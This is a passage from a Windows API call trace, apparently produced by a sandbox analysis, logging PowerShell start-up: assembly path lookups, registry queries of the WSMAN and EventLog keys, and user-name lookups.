lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0054.557] GetLastError () returned 0x57 [0054.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0054.557] GetLastError () returned 0x57 [0054.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0054.561] GetLastError () returned 0x57 [0054.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0054.561] GetLastError () returned 0x57 [0054.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.563] GetLastError () returned 0x57 [0054.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.563] GetLastError () returned 0x57 [0054.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0054.564] GetLastError () returned 0x57 [0054.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0054.565] GetLastError () returned 0x57 [0054.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0054.566] GetLastError () returned 0x57 [0054.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0054.566] GetLastError () returned 0x57 [0054.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0054.568] GetLastError () returned 0x57 [0054.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0054.568] GetLastError () returned 0x57 [0054.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0054.569] GetLastError () returned 0x57 [0054.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2ce620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0054.569] GetLastError () returned 0x57 [0054.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.581] GetLastError () returned 0xcb [0054.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.583] GetLastError () returned 0xcb [0054.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.586] GetLastError () returned 0xcb [0054.588] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce9cc | out: phkResult=0x2ce9cc*=0x31c) returned 0x0 [0054.589] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2cea1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2cea20, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2cea1c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2cea20*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.590] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x3b8428, lpcchValueName=0x2cea44, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x2cea44, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0054.591] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x3b8428, lpcchValueName=0x2cea44, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x2cea44, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0054.591] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x2cea24, lpData=0x0, lpcbData=0x2cea20*=0x0 | out: lpType=0x2cea24*=0x1, lpData=0x0, lpcbData=0x2cea20*=0x8) returned 0x0 [0054.591] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x2cea24, lpData=0x3b8428, lpcbData=0x2cea20*=0x8 | out: lpType=0x2cea24*=0x1, lpData="2.0", lpcbData=0x2cea20*=0x8) returned 0x0 [0054.647] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce988 | out: phkResult=0x2ce988*=0x320) returned 0x0 [0054.648] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2ce9d8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2ce9dc, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2ce9d8*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2ce9dc*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.648] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x3b8428, lpcchValueName=0x2cea00, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x2cea00, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0054.648] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x3b8428, lpcchValueName=0x2cea00, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x2cea00, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0054.648] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x2ce9e0, lpData=0x0, lpcbData=0x2ce9dc*=0x0 | out: lpType=0x2ce9e0*=0x1, lpData=0x0, lpcbData=0x2ce9dc*=0x8) returned 0x0 [0054.648] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0x2ce9e0, lpData=0x3b8428, lpcbData=0x2ce9dc*=0x8 | out: lpType=0x2ce9e0*=0x1, lpData="2.0", lpcbData=0x2ce9dc*=0x8) returned 0x0 [0054.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.649] GetLastError () returned 0xcb [0054.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.651] GetLastError () returned 0xcb [0054.659] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce948 | out: phkResult=0x2ce948*=0x324) returned 0x0 [0054.659] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2ce9b0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2ce9ac, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2ce9b0*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2ce9ac*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.660] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x3b8428, lpcchName=0x2ce9cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x2ce9cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.660] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x3b8428, lpcchName=0x2ce9cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x2ce9cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.660] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x3b8428, lpcchName=0x2ce9cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x2ce9cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.660] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x3b8428, lpcchName=0x2ce9cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x2ce9cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.661] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x3b8428, lpcchName=0x2ce9cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x2ce9cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.661] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x3b8428, lpcchName=0x2ce9cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x2ce9cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.661] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x3b8428, lpcchName=0x2ce9cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x2ce9cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.661] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x3b8428, lpcchName=0x2ce9cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x2ce9cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.661] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x3b8428, lpcchName=0x2ce9cc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x2ce9cc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.661] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x340) returned 0x0 [0054.662] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x0) returned 0x2 [0054.662] RegOpenKeyExW (in: hKey=0x324, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x350) returned 0x0 [0054.662] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x0) returned 0x2 [0054.662] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x354) returned 0x0 [0054.662] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x0) returned 0x2 [0054.662] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x358) returned 0x0 [0054.662] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x0) returned 0x2 [0054.662] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x35c) returned 0x0 [0054.663] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x0) returned 0x2 [0054.663] RegOpenKeyExW (in: hKey=0x324, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x360) returned 0x0 [0054.663] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x0) returned 0x2 [0054.663] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x364) returned 0x0 [0054.663] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x0) returned 0x2 [0054.663] RegOpenKeyExW (in: hKey=0x324, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x368) returned 0x0 [0054.664] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x0) returned 0x2 [0054.664] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x36c) returned 0x0 [0054.664] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce978 | out: phkResult=0x2ce978*=0x370) returned 0x0 [0054.664] RegCloseKey (hKey=0x370) returned 0x0 [0054.664] RegCloseKey (hKey=0x324) returned 0x0 [0054.665] RegCloseKey (hKey=0x36c) returned 0x0 [0054.673] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b29f8, nSize=0x2ceac4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x2ceac4) returned 0x1 [0054.674] GetLastError () returned 0x3 [0054.675] GetUserNameW (in: lpBuffer=0x3b8428, pcbBuffer=0x2ceacc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2ceacc) returned 1 [0054.702] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce92c | out: phkResult=0x2ce92c*=0x324) returned 0x0 [0054.703] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2ce994, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2ce990, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2ce994*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2ce990*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.703] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.703] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.703] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.703] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.703] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.703] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.703] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.704] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.704] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x3b8428, lpcchName=0x2ce9b0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x2ce9b0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.704] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x370) returned 0x0 [0054.704] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.704] RegOpenKeyExW (in: hKey=0x324, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x374) returned 0x0 [0054.705] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.705] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x378) returned 0x0 [0054.705] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.705] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x37c) returned 0x0 [0054.705] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.705] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x380) returned 0x0 [0054.705] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.705] RegOpenKeyExW (in: hKey=0x324, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x384) returned 0x0 [0054.706] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.706] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x388) returned 0x0 [0054.706] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.706] RegOpenKeyExW (in: hKey=0x324, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x38c) returned 0x0 [0054.706] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x0) returned 0x2 [0054.706] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x390) returned 0x0 [0054.706] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce95c | out: phkResult=0x2ce95c*=0x394) returned 0x0 [0054.707] RegCloseKey (hKey=0x394) returned 0x0 [0054.707] RegCloseKey (hKey=0x324) returned 0x0 [0054.707] RegCloseKey (hKey=0x390) returned 0x0 [0054.707] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce92c | out: phkResult=0x2ce92c*=0x390) returned 0x0 [0054.707] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x2ce994, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2ce990, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x2ce994*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x2ce990*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0054.707] 